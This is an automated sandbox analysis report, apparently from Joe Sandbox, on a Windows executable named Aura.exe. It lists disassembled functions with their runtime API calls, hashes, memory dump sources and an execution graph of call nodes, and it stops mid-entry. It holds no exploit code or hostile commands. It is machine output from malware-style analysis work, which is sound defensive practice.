                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                • Instruction ID: 33eeade6dc9700fa27e5d1a08a7b983d3be1d08092ff6f6a4cf5e69725f08109
                                                • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                • Instruction Fuzzy Hash: 33110A71644B04AAE630ABB0CC05FEB779DBF04708F844815B2ADA7AF0DB75B51C8762
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CDC8507
                                                • __fassign.LIBCMT ref: 6CDC86EC
                                                • __fassign.LIBCMT ref: 6CDC8709
                                                • WriteFile.KERNEL32(?,6CDC6CA3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDC8751
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CDC8791
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDC8839
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 1735259414-0
                                                • Opcode ID: b21c513137fb0aebbab591f66c07da6622aa49b00b87626637d777ad52e8a271
                                                • Instruction ID: b0a774aeabe45a3f5d65f9418dd94d33d76994b1fa2233ea434dc80c0acc30d3
                                                • Opcode Fuzzy Hash: b21c513137fb0aebbab591f66c07da6622aa49b00b87626637d777ad52e8a271
                                                • Instruction Fuzzy Hash: 83C1AD75E042589FCF00CFA8C880AEDFBB9AF49318F28416AE855B7751D7319A06CB61
                                                APIs
                                                • GetLastError.KERNEL32(00000001,?,6CDC2C35,6CDC1D60,6CDC1779,?,6CDC19B1,?,00000001,?,?,00000001,?,6CDD1120,0000000C,6CDC1AAA), ref: 6CDC2F75
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDC2F83
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDC2F9C
                                                • SetLastError.KERNEL32(00000000,6CDC19B1,?,00000001,?,?,00000001,?,6CDD1120,0000000C,6CDC1AAA,?,00000001,?), ref: 6CDC2FEE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 3e5fd0926733d91378e2dd9905978d0c44bb2eb43ec3745856ce852545fa8cf6
                                                • Instruction ID: c72318a8b0f709815f472a65d71b843d7c2cf611c9162e705bd851751b60f7e0
                                                • Opcode Fuzzy Hash: 3e5fd0926733d91378e2dd9905978d0c44bb2eb43ec3745856ce852545fa8cf6
                                                • Instruction Fuzzy Hash: 7101D83230D2159EAF1517BA9C4999B76FCEB8777C730032AF52087DF0EF1148045662
                                                Strings
                                                • C:\Users\user\Desktop\Aura.exe, xrefs: 6CDC5464
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\Aura.exe
                                                • API String ID: 0-2168703445
                                                • Opcode ID: 6ff90c3801e692d2119a90bf397c483c57916a2424a53823c7702a7a91299e58
                                                • Instruction ID: d71b31456ffb4b9625927aeb8321bc3fc4c35c7a9b290c0c7b91e04017cfc38f
                                                • Opcode Fuzzy Hash: 6ff90c3801e692d2119a90bf397c483c57916a2424a53823c7702a7a91299e58
                                                • Instruction Fuzzy Hash: 71218071718209AF9B119FA5CC80D9B77AEEF0536C7148618F92497A60FB31DD10A7A2
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,?,6CDC31A4,00000000,?,00000001,00000000,?,6CDC321B,00000001,FlsFree,6CDCCD3C,FlsFree,00000000), ref: 6CDC3173
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-
                                                • API String ID: 3664257935-2084034818
                                                • Opcode ID: 88286c63dab97c9dc379e446fb0036a1c6d48357efd14a9c64ddc9bc579700dc
                                                • Instruction ID: 26d807c1828fb439672a0e32c25df3d1e8c61d832621eb20129fd02af292ea6a
                                                • Opcode Fuzzy Hash: 88286c63dab97c9dc379e446fb0036a1c6d48357efd14a9c64ddc9bc579700dc
                                                • Instruction Fuzzy Hash: B4117771F45625EFDB125BA98C407CA37BC9F42764F150212EA14E7690D760EA0086D6
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CDC374C,?,?,6CDC3714,?,00000001,?), ref: 6CDC37AF
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDC37C2
                                                • FreeLibrary.KERNEL32(00000000,?,?,6CDC374C,?,?,6CDC3714,?,00000001,?), ref: 6CDC37E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 47849f15a2532d08ee1b20178f5bfd654a2a7c3184f52316bb6d46c5518e7875
                                                • Instruction ID: f3fcf76ad4b3f7611f0b4e56b3820ff3cb00613d7f71752e2f457bbb6019f941
                                                • Opcode Fuzzy Hash: 47849f15a2532d08ee1b20178f5bfd654a2a7c3184f52316bb6d46c5518e7875
                                                • Instruction Fuzzy Hash: 8DF0F871B0111AFBEF01BB91C909B9E7E7DAB81659F200060E601A39A0CB358B15EB92
                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 6CDC7E3B
                                                • __alloca_probe_16.LIBCMT ref: 6CDC7F01
                                                • __freea.LIBCMT ref: 6CDC7F6D
                                                  • Part of subcall function 6CDC6F6C: HeapAlloc.KERNEL32(00000000,6CDC6CA3,6CDC6CA3,?,6CDC59A3,00000220,?,6CDC6CA3,?,?,?,?,6CDC8DC1,00000001,?,?), ref: 6CDC6F9E
                                                • __freea.LIBCMT ref: 6CDC7F76
                                                • __freea.LIBCMT ref: 6CDC7F99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                • String ID:
                                                • API String ID: 1096550386-0
                                                • Opcode ID: 990d6ed7baed542d70484c86871a4af4273055415e566c9fee294e79f76cb646
                                                • Instruction ID: cf4c060441912b882668fe2071d2b5818c5004be3d8d8df0c0503a510f341642
                                                • Opcode Fuzzy Hash: 990d6ed7baed542d70484c86871a4af4273055415e566c9fee294e79f76cb646
                                                • Instruction Fuzzy Hash: F8518E7270421AFBEB118FA4CC80EAB36EDEF45758F220129F91497660E774DC55CAA2
                                                APIs
                                                • _free.LIBCMT ref: 6CDC931D
                                                  • Part of subcall function 6CDC4BF3: HeapFree.KERNEL32(00000000,00000000,?,6CDC3E2C), ref: 6CDC4C09
                                                  • Part of subcall function 6CDC4BF3: GetLastError.KERNEL32(?,?,6CDC3E2C), ref: 6CDC4C1B
                                                • _free.LIBCMT ref: 6CDC932F
                                                • _free.LIBCMT ref: 6CDC9341
                                                • _free.LIBCMT ref: 6CDC9353
                                                • _free.LIBCMT ref: 6CDC9365
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 013da3200c4df8848d1addf4bc44cb12db5acb9f0820d4253fe22427c5d7896d
                                                • Instruction ID: 62b52de4e55f1543b0d8ac4ff5cf12a7b495d51cebdf4d65e8dd179128d3d706
                                                • Opcode Fuzzy Hash: 013da3200c4df8848d1addf4bc44cb12db5acb9f0820d4253fe22427c5d7896d
                                                • Instruction Fuzzy Hash: 7AF04F3670560497CA00DB98E484E6A73FEBF067187651805F078D7E64CB35FD804AA2
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID: *?
                                                • API String ID: 269201875-2564092906
                                                • Opcode ID: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                • Instruction ID: f23055b8bcf650561be7a3bfb2f4cf346d02cfb48d43aa02586d755e911482c6
                                                • Opcode Fuzzy Hash: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                • Instruction Fuzzy Hash: 3F616D75E002199FDB15CFA9C8809EDFBF9FF48314B29826AE814E7710D7319E458BA1
                                                APIs
                                                  • Part of subcall function 6CDC5319: _free.LIBCMT ref: 6CDC5327
                                                  • Part of subcall function 6CDC5EED: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CDC7F63,?,00000000,00000000), ref: 6CDC5F99
                                                • GetLastError.KERNEL32 ref: 6CDC4D5F
                                                • __dosmaperr.LIBCMT ref: 6CDC4D66
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC4DA5
                                                • __dosmaperr.LIBCMT ref: 6CDC4DAC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                • String ID:
                                                • API String ID: 167067550-0
                                                • Opcode ID: 0e40d0b39efabde5674af047331a0270fd9f89bc6e66182db5f83cf649eb16bc
                                                • Instruction ID: e4e911271adb382a2198e6e3329760d340f05410e67bdd73bcd7a575513246e7
                                                • Opcode Fuzzy Hash: 0e40d0b39efabde5674af047331a0270fd9f89bc6e66182db5f83cf649eb16bc
                                                • Instruction Fuzzy Hash: CC21B371B04219AFDB10AF668880D7BB7ADEF0136C7048718F96597E70E771EC509BA2
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,6CDC8907,?,00000001,6CDC6D14,?,6CDC8DC1,00000001,?,?,?,6CDC6CA3,?,00000000), ref: 6CDC45FC
                                                • _free.LIBCMT ref: 6CDC4659
                                                • _free.LIBCMT ref: 6CDC468F
                                                • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CDC8DC1,00000001,?,?,?,6CDC6CA3,?,00000000,00000000,6CDD1360,0000002C,6CDC6D14), ref: 6CDC469A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 6693ea1a333b12d84c7bf0ac494bc2e29267d3cfd77c9d51f204bcf446256dcc
                                                • Instruction ID: 0793fd09cfeccfae225bbf3fa6cc30ee825a241d3802b370e46751f23df2721d
                                                • Opcode Fuzzy Hash: 6693ea1a333b12d84c7bf0ac494bc2e29267d3cfd77c9d51f204bcf446256dcc
                                                • Instruction Fuzzy Hash: 6011A3763845016A9B1217B58C80FFA367DABC627DB380725F234D3AF4EF6588095222
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000001,6CDC4B88,6CDC4C19,?,?,6CDC3E2C), ref: 6CDC4753
                                                • _free.LIBCMT ref: 6CDC47B0
                                                • _free.LIBCMT ref: 6CDC47E6
                                                • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CDC4B88,6CDC4C19,?,?,6CDC3E2C), ref: 6CDC47F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 284e2f72ba7e9e92e04d750e89b7825e2603d3f7708cc1db785944a681f7c3f2
                                                • Instruction ID: 61185a88ab52489b5322530ea0add0c0a87040f59dece4bdfeeeaf53c9fb36be
                                                • Opcode Fuzzy Hash: 284e2f72ba7e9e92e04d750e89b7825e2603d3f7708cc1db785944a681f7c3f2
                                                • Instruction Fuzzy Hash: D911A9753045416AD70227B94C84FBB367D9BC7279B390325F634D3AF0DF658C1946A2
                                                APIs
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CDC95B0,?,00000001,?,00000001,?,6CDC8896,?,?,00000001), ref: 6CDC9B6D
                                                • GetLastError.KERNEL32(?,6CDC95B0,?,00000001,?,00000001,?,6CDC8896,?,?,00000001,?,00000001,?,6CDC8DE2,6CDC6CA3), ref: 6CDC9B79
                                                  • Part of subcall function 6CDC9B3F: CloseHandle.KERNEL32(FFFFFFFE,6CDC9B89,?,6CDC95B0,?,00000001,?,00000001,?,6CDC8896,?,?,00000001,?,00000001), ref: 6CDC9B4F
                                                • ___initconout.LIBCMT ref: 6CDC9B89
                                                  • Part of subcall function 6CDC9B01: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDC9B30,6CDC959D,00000001,?,6CDC8896,?,?,00000001,?), ref: 6CDC9B14
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CDC95B0,?,00000001,?,00000001,?,6CDC8896,?,?,00000001,?), ref: 6CDC9B9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: ab63bf01d99603d378af2b506e34caf8c4f3b57288cf9c447ffafb4dea284c4c
                                                • Instruction ID: 894b354db0475a73701f1422d0c2c62ab103baf5f7845b4cf7e523b1b838ea1c
                                                • Opcode Fuzzy Hash: ab63bf01d99603d378af2b506e34caf8c4f3b57288cf9c447ffafb4dea284c4c
                                                • Instruction Fuzzy Hash: 17F01C36210155FBCF122FD2CC44E993F7FFB593A8B154110FB1986520CA329A20EB91
                                                APIs
                                                • _free.LIBCMT ref: 6CDC3F2D
                                                  • Part of subcall function 6CDC4BF3: HeapFree.KERNEL32(00000000,00000000,?,6CDC3E2C), ref: 6CDC4C09
                                                  • Part of subcall function 6CDC4BF3: GetLastError.KERNEL32(?,?,6CDC3E2C), ref: 6CDC4C1B
                                                • _free.LIBCMT ref: 6CDC3F40
                                                • _free.LIBCMT ref: 6CDC3F51
                                                • _free.LIBCMT ref: 6CDC3F62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 87071a1d7f5a79ff41e3322586ed24215461ac5316c54a349130744f9168a8ea
                                                • Instruction ID: 5dbb736420f4449f82336d80816a1379b8cde5b0afe546e01968e38e5efe49fe
                                                • Opcode Fuzzy Hash: 87071a1d7f5a79ff41e3322586ed24215461ac5316c54a349130744f9168a8ea
                                                • Instruction Fuzzy Hash: BBE092BDA101249BDF125FA5AC00AA93A7ABF5A6043055006F41813634EB7B8B669FA6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\Aura.exe
                                                • API String ID: 0-2168703445
                                                • Opcode ID: 08909976e4ef5c35b895f312ad75e2fda36ab95b963203f49ebc1849f9b67058
                                                • Instruction ID: af74c49955ee01afd6486da4f493d093a938e374b75ab0189f6d2dce4e5d3476
                                                • Opcode Fuzzy Hash: 08909976e4ef5c35b895f312ad75e2fda36ab95b963203f49ebc1849f9b67058
                                                • Instruction Fuzzy Hash: DE4183B1B04219EBDB11CF99C880ADEBBFCEF86314B140166E504D7760EB718A45CB62

                                                Execution Graph

                                                Execution Coverage:5.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:16.6%
                                                Total number of Nodes:295
                                                Total number of Limit Nodes:21
                                                execution_graph 6035 278eaf0 6038 2781bb0 6035->6038 6037 278eaf9 CoUninitialize 6039 2781bbe 6038->6039 6322 279d8b0 6323 279d8e0 6322->6323 6323->6323 6326 278b5f0 6323->6326 6328 278b680 6326->6328 6327 27bfa00 RtlFreeHeap 6327->6328 6328->6327 6329 278b6bd 6328->6329 6204 278d8f2 6205 278d900 6204->6205 6208 278d94e 6205->6208 6236 27bfac0 LdrInitializeThunk 6205->6236 6206 278d9de 6238 2788fd0 6206->6238 6208->6206 6237 27bfac0 LdrInitializeThunk 6208->6237 6211 278da17 6243 27a5570 6211->6243 6213 278da1d 6214 2788fd0 ExitProcess 6213->6214 6215 278da37 6214->6215 6216 2788fd0 ExitProcess 6215->6216 6217 278da64 6216->6217 6252 27a61d0 6217->6252 6236->6208 6237->6206 6256 2788bf0 6238->6256 6240 278906a 6240->6211 6241 2788bf0 ExitProcess 6242 2789010 6241->6242 6242->6240 6242->6241 6250 27a55c0 6243->6250 6244 27a56d6 6244->6213 6245 27a5982 6248 27a39b0 2 API calls 6245->6248 6246 27a5824 6246->6245 6247 27a39b0 2 API calls 6246->6247 6249 27a5ac2 6246->6249 6247->6245 6248->6249 6250->6244 6250->6245 6250->6246 6250->6250 6251 27c2190 LdrInitializeThunk 6250->6251 6251->6246 6253 27a61de 6252->6253 6260 27c2660 6253->6260 6257 2788c54 6256->6257 6259 2788bfe 6256->6259 6258 2788c5b ExitProcess 6257->6258 6257->6259 6258->6259 6259->6242 6261 27c2680 6260->6261 6263 27a6290 6261->6263 6264 27bfac0 LdrInitializeThunk 6261->6264 6264->6263 6330 27bb4b0 6333 27bb120 6330->6333 6336 27bb4d7 6330->6336 6331 27bd3e0 LdrInitializeThunk 6331->6333 6332 27bd490 LdrInitializeThunk 6332->6333 6333->6331 6333->6332 6334 27bafb7 6333->6334 6335 27bd290 LdrInitializeThunk 6333->6335 6333->6336 6337 27bcfa0 RtlFreeHeap 6334->6337 6335->6333 6336->6336 6339 27bafbd 6337->6339 6338 27bb09e 6339->6338 6341 27bfac0 LdrInitializeThunk 6339->6341 6341->6338 6342 278ecad 6343 278ecc0 6342->6343 6344 278ed0e 6343->6344 6348 27bfac0 LdrInitializeThunk 6343->6348 6349 27bfac0 LdrInitializeThunk 6344->6349 6347 278ede1 6348->6344 6349->6347 6425 278c7ad 6426 27bcfa0 RtlFreeHeap 6425->6426 6427 278c7b3 6426->6427 6428 27bcfa0 RtlFreeHeap 6427->6428 6429 278c7c6 6428->6429 6171 278a420 6172 278a432 6171->6172 6175 278b0d0 6172->6175 6178 278b100 6175->6178 6176 278a452 6177 27bcfa0 RtlFreeHeap 6177->6176 6178->6176 6178->6177 6178->6178 6179 2799420 6182 27bd000 6179->6182 6181 279942f 6181->6181 6183 27bd030 6182->6183 6186 27bd08e 6183->6186 6190 27bfac0 LdrInitializeThunk 6183->6190 6184 27bd25d 6184->6181 6186->6184 6189 27bd19f 6186->6189 6191 27bfac0 LdrInitializeThunk 6186->6191 6187 27bcfa0 RtlFreeHeap 6187->6184 6189->6187 6190->6186 6191->6189 6100 27a1660 6101 27a1670 6100->6101 6101->6101 6102 27a1812 6101->6102 6103 27a172e 6101->6103 6105 27a1751 6101->6105 6108 27c2190 6101->6108 6107 27a39b0 2 API calls 6102->6107 6105->6102 6105->6103 6112 27a39b0 6105->6112 6107->6103 6109 27c21b0 6108->6109 6109->6109 6110 27c22be 6109->6110 6124 27bfac0 LdrInitializeThunk 6109->6124 6110->6105 6125 27c1ff0 6112->6125 6114 27a4335 6114->6102 6116 27a4225 6117 27bcfa0 RtlFreeHeap 6116->6117 6119 27a4239 6117->6119 6118 27a39f3 6118->6114 6121 27a3b32 6118->6121 6129 27bfac0 LdrInitializeThunk 6118->6129 6119->6114 6131 27bfac0 LdrInitializeThunk 6119->6131 6121->6116 6123 27bcfa0 RtlFreeHeap 6121->6123 6130 27bfac0 LdrInitializeThunk 6121->6130 6123->6121 6124->6110 6127 27c2010 6125->6127 6126 27c213e 6126->6118 6127->6126 6132 27bfac0 LdrInitializeThunk 6127->6132 6129->6118 6130->6121 6131->6119 6132->6126 6377 27c2520 6378 27c2550 6377->6378 6378->6378 6381 27c258e 6378->6381 6383 27bfac0 LdrInitializeThunk 6378->6383 6380 27c261e 6381->6380 6384 27bfac0 LdrInitializeThunk 6381->6384 6383->6381 6384->6380 6385 278e51a 6386 2788fd0 ExitProcess 6385->6386 6387 278e528 6386->6387 6406 278e3da 6407 278e3f0 6406->6407 6409 278e42a 6407->6409 6412 27bfac0 LdrInitializeThunk 6407->6412 6411 278e49a 6409->6411 6413 27bfac0 LdrInitializeThunk 6409->6413 6412->6409 6413->6411 6192 278ea1c 6193 278eaa0 6192->6193 6193->6193 6194 278eaee 6193->6194 6196 27bfac0 